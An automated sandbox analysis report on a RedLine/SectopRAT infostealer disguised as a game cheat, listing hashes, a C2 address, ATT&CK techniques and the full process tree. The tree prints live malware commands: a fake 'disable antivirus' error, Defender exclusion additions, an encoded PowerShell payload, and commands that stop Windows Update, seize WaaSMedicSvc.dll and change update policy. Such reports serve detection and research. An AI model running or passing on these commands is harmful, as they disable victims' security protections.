redline | ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Analysis

max time kernel
149s
max time network
141s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06293c3726a8b6029225668dcfb8c7e8.exe
Size

7.3MB
MD5

06293c3726a8b6029225668dcfb8c7e8
SHA1

1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512

33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP

196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr

Score

10^/10

redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Lucifer

162.55.169.73:49194

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe	family_redline
behavioral1/memory/2164-31-0x00000000009E0000-0x00000000009FE000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe	family_sectoprat
behavioral1/memory/2164-31-0x00000000009E0000-0x00000000009FE000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.exepowershell.exepowershell.exe

pid process

2640 powershell.EXE
2664 powershell.exe
2560 powershell.exe
2600 powershell.exe

pid	process
2640	powershell.EXE
2664	powershell.exe
2560	powershell.exe
2600	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

conhost.execonhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

1380 takeown.exe
1580 icacls.exe
264 takeown.exe
2892 icacls.exe
1688 takeown.exe
2280 icacls.exe
1876 takeown.exe
2332 icacls.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 7 IoCs

Processes:

explorer.exewindowshost.exesvchost.exesvchost.execominto.exeupdater.exeupdater.exe

pid process

2164 explorer.exe
2688 windowshost.exe
2652 svchost.exe
2624 svchost.exe
1276 cominto.exe
1880 updater.exe
2928 updater.exe
Loads dropped DLL 8 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid process

2160 cmd.exe
2608 cmd.exe
2944 cmd.exe
2932 cmd.exe
2380 cmd.exe
2380 cmd.exe
708 cmd.exe
1812 cmd.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

1876 takeown.exe
2332 icacls.exe
1380 takeown.exe
1580 icacls.exe
264 takeown.exe
2892 icacls.exe
1688 takeown.exe
2280 icacls.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

pid	process
1380	takeown.exe
1580	icacls.exe
264	takeown.exe
2892	icacls.exe
1688	takeown.exe
2280	icacls.exe
1876	takeown.exe
2332	icacls.exe

pid	process
2164	explorer.exe
2688	windowshost.exe
2652	svchost.exe
2624	svchost.exe
1276	cominto.exe
1880	updater.exe
2928	updater.exe

pid	process
2160	cmd.exe
2608	cmd.exe
2944	cmd.exe
2932	cmd.exe
2380	cmd.exe
2380	cmd.exe
708	cmd.exe
1812	cmd.exe

pid	process
1876	takeown.exe
2332	icacls.exe
1380	takeown.exe
1580	icacls.exe
264	takeown.exe
2892	icacls.exe
1688	takeown.exe
2280	icacls.exe

Power Settings 1 TTPs 20 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exe

pid	process
2736	powercfg.exe
1760	cmd.exe
2056	powercfg.exe
296	powercfg.exe
2752	powercfg.exe
2648	powercfg.exe
2416	powercfg.exe
2500	powercfg.exe
2544	cmd.exe
316	cmd.exe
3012	powercfg.exe
2840	powercfg.exe
2492	powercfg.exe
1988	powercfg.exe
2476	powercfg.exe
3048	powercfg.exe
2104	powercfg.exe
2524	cmd.exe
2392	powercfg.exe
1568	powercfg.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	pid	process	target process
PID 536 set thread context of 2504	536	conhost.exe	conhost.exe
PID 2268 set thread context of 1016	2268	conhost.exe	conhost.exe
PID 2620 set thread context of 1808	2620	conhost.exe	conhost.exe
PID 1492 set thread context of 2232	1492	conhost.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 60 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2800	sc.exe
3028	sc.exe
1084	sc.exe
1684	sc.exe
2472	sc.exe
2580	sc.exe
1904	sc.exe
1672	sc.exe
1744	sc.exe
2460	sc.exe
288	sc.exe
2676	sc.exe
1892	sc.exe
600	sc.exe
2508	sc.exe
1880	sc.exe
2060	sc.exe
2936	sc.exe
2984	sc.exe
868	sc.exe
1944	sc.exe
1916	sc.exe
1908	sc.exe
2596	sc.exe
2872	sc.exe
1856	sc.exe
2272	sc.exe
2496	sc.exe
2748	sc.exe
2016	sc.exe
2600	sc.exe
2684	sc.exe
1964	sc.exe
1224	sc.exe
1456	sc.exe
2084	sc.exe
2932	sc.exe
2796	sc.exe
2572	sc.exe
1884	sc.exe
1424	sc.exe
1928	sc.exe
2448	sc.exe
2700	sc.exe
2320	sc.exe
324	sc.exe
2440	sc.exe
2348	sc.exe
2412	sc.exe
2548	sc.exe
2200	sc.exe
2332	sc.exe
684	sc.exe
1684	sc.exe
2892	sc.exe
592	sc.exe
408	sc.exe
2476	sc.exe
2456	sc.exe
1936	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

06293c3726a8b6029225668dcfb8c7e8.execmd.exewindowshost.exepowershell.exepowershell.execmd.execmd.execmd.execmd.exepowershell.exeexplorer.exeWScript.exepowershell.EXEcmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	06293c3726a8b6029225668dcfb8c7e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windowshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b2068a0231db01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2272 schtasks.exe
348 schtasks.exe

pid	process
2272	schtasks.exe
348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.exepowershell.execonhost.execonhost.exe

pid	process
2600	powershell.exe
2664	powershell.exe
2560	powershell.exe
2188	powershell.exe
1540	powershell.exe
536	conhost.exe
2268	conhost.exe
2640	powershell.EXE
2020	powershell.exe
1464	powershell.exe
1492	conhost.exe
2620	conhost.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

powershell.exepowershell.exeexplorer.exepowershell.execominto.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.execonhost.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exepowershell.execonhost.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2164	explorer.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	1276	cominto.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	2476	powercfg.exe
Token: SeShutdownPrivilege	3048	powercfg.exe
Token: SeShutdownPrivilege	2104	powercfg.exe
Token: SeDebugPrivilege	2268	conhost.exe
Token: SeDebugPrivilege	536	conhost.exe
Token: SeShutdownPrivilege	2752	powercfg.exe
Token: SeShutdownPrivilege	2736	powercfg.exe
Token: SeShutdownPrivilege	2840	powercfg.exe
Token: SeShutdownPrivilege	3012	powercfg.exe
Token: SeShutdownPrivilege	2648	powercfg.exe
Token: SeDebugPrivilege	2640	powershell.EXE
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1492	conhost.exe
Token: SeDebugPrivilege	2620	conhost.exe
Token: SeShutdownPrivilege	2056	powercfg.exe
Token: SeShutdownPrivilege	296	powercfg.exe
Token: SeShutdownPrivilege	2392	powercfg.exe
Token: SeShutdownPrivilege	1568	powercfg.exe
Token: SeShutdownPrivilege	2416	powercfg.exe
Token: SeShutdownPrivilege	2500	powercfg.exe
Token: SeShutdownPrivilege	2492	powercfg.exe
Token: SeShutdownPrivilege	1988	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exe

description	pid	process	target process
PID 2704 wrote to memory of 2772	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2772	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2772	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2772	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2784	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2784	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2784	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2784	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2944	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2944	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2944	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2944	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2932	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2932	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2932	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2932	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2160	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2160	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2160	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2160	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2608	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2608	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2608	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2704 wrote to memory of 2608	2704	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 2772 wrote to memory of 2600	2772	cmd.exe	powershell.exe
PID 2772 wrote to memory of 2600	2772	cmd.exe	powershell.exe
PID 2772 wrote to memory of 2600	2772	cmd.exe	powershell.exe
PID 2772 wrote to memory of 2600	2772	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2664	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2664	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2664	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2664	2784	cmd.exe	powershell.exe
PID 2160 wrote to memory of 2164	2160	cmd.exe	explorer.exe
PID 2160 wrote to memory of 2164	2160	cmd.exe	explorer.exe
PID 2160 wrote to memory of 2164	2160	cmd.exe	explorer.exe
PID 2160 wrote to memory of 2164	2160	cmd.exe	explorer.exe
PID 2608 wrote to memory of 2688	2608	cmd.exe	windowshost.exe
PID 2608 wrote to memory of 2688	2608	cmd.exe	windowshost.exe
PID 2608 wrote to memory of 2688	2608	cmd.exe	windowshost.exe
PID 2608 wrote to memory of 2688	2608	cmd.exe	windowshost.exe
PID 2932 wrote to memory of 2652	2932	cmd.exe	svchost.exe
PID 2932 wrote to memory of 2652	2932	cmd.exe	svchost.exe
PID 2932 wrote to memory of 2652	2932	cmd.exe	svchost.exe
PID 2932 wrote to memory of 2652	2932	cmd.exe	svchost.exe
PID 2944 wrote to memory of 2624	2944	cmd.exe	svchost.exe
PID 2944 wrote to memory of 2624	2944	cmd.exe	svchost.exe
PID 2944 wrote to memory of 2624	2944	cmd.exe	svchost.exe
PID 2944 wrote to memory of 2624	2944	cmd.exe	svchost.exe
PID 2688 wrote to memory of 2200	2688	windowshost.exe	WScript.exe
PID 2688 wrote to memory of 2200	2688	windowshost.exe	WScript.exe
PID 2688 wrote to memory of 2200	2688	windowshost.exe	WScript.exe
PID 2688 wrote to memory of 2200	2688	windowshost.exe	WScript.exe
PID 2784 wrote to memory of 2560	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2560	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2560	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 2560	2784	cmd.exe	powershell.exe
PID 2200 wrote to memory of 2380	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2380	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2380	2200	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2380	2200	WScript.exe	cmd.exe
PID 2380 wrote to memory of 1276	2380	cmd.exe	cominto.exe
PID 2380 wrote to memory of 1276	2380	cmd.exe	cominto.exe
PID 2380 wrote to memory of 1276	2380	cmd.exe	cominto.exe
PID 2380 wrote to memory of 1276	2380	cmd.exe	cominto.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe
"C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Executes dropped EXE
    PID:2624
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Drops file in Drivers directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        5⤵
        
        PID:2336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:2472
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1684
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:288
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2508
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2412
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1880
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:2892
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2796
      - C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        6⤵
        Launches sc.exe
        
        PID:1916
      - C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2572
      - C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2748
      - C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2596
      - C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2016
      - C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1424
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:2872
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:1904
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1688
      - C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2280
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        6⤵
        
        PID:296
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        6⤵
        
        PID:976
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        6⤵
        
        PID:1564
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        6⤵
        
        PID:324
